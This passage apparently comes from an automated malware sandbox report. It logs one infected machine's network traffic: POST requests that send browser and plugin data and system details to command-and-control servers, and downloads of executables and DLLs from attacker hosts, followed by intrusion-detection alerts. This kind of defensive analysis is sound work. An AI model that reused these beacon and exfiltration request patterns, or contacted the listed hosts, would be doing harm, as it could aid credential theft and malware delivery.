73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="message"browsers------AKJEGCFBGDHJJJJJKJEC--
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 2d 2d 0d 0a Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="message"plugins------IIJDBAKKKFBFHIDGIIEH--
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 37 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010748001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="message"fplugins------AAKEGDAKEHJDHIDHJJDA--
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 185.215.113.206Content-Length: 5295Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                                  Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 37 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010749001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFIJJEBKEBFCBGDAEGDHost: 185.215.113.206Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 37 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010750001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIECHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 2d 2d 0d 0a Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file"------GHDBKFHIJKJKECAAAECA--
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="file"------GDBFBFCBFBKECAAKJKFB--
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Fru7Nk9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.209Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 35 45 32 41 43 36 31 37 42 35 30 44 37 39 46 41 42 31 35 30 42 45 39 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 35 35 43 33 31 46 34 45 30 34 34 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 32 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6255E2AC617B50D79FAB150BE92BB81278509C05BEA3669A52777FA613555C31F4E0442A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730502
                                  Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                  Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 496411Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 37 32 32 38 37 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
                                  Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
                                  Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
                                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 32 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E2BDD70A77B12875B35E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                  Source: Joe Sandbox ViewIP Address: 34.197.122.172 34.197.122.172
                                  Source: Joe Sandbox ViewIP Address: 31.41.244.11 31.41.244.11
                                  Source: Joe Sandbox ViewIP Address: 31.41.244.11 31.41.244.11
                                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49818 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49826 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49807 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49820 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49883 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49898 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49913 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49931 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49819 -> 135.181.65.216:80
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49920 -> 135.181.65.216:80
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49837 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49955 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49910 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49974 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49988 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50004 -> 172.67.156.127:443
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50061 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50064 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50067 -> 31.41.244.11:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50075 -> 31.41.244.11:80
                                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50065 -> 185.215.113.206:80
                                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50084 -> 185.215.113.206:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49848 -> 140.82.121.3:443
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49893 -> 140.82.121.3:443
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49976 -> 140.82.121.3:443
                                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
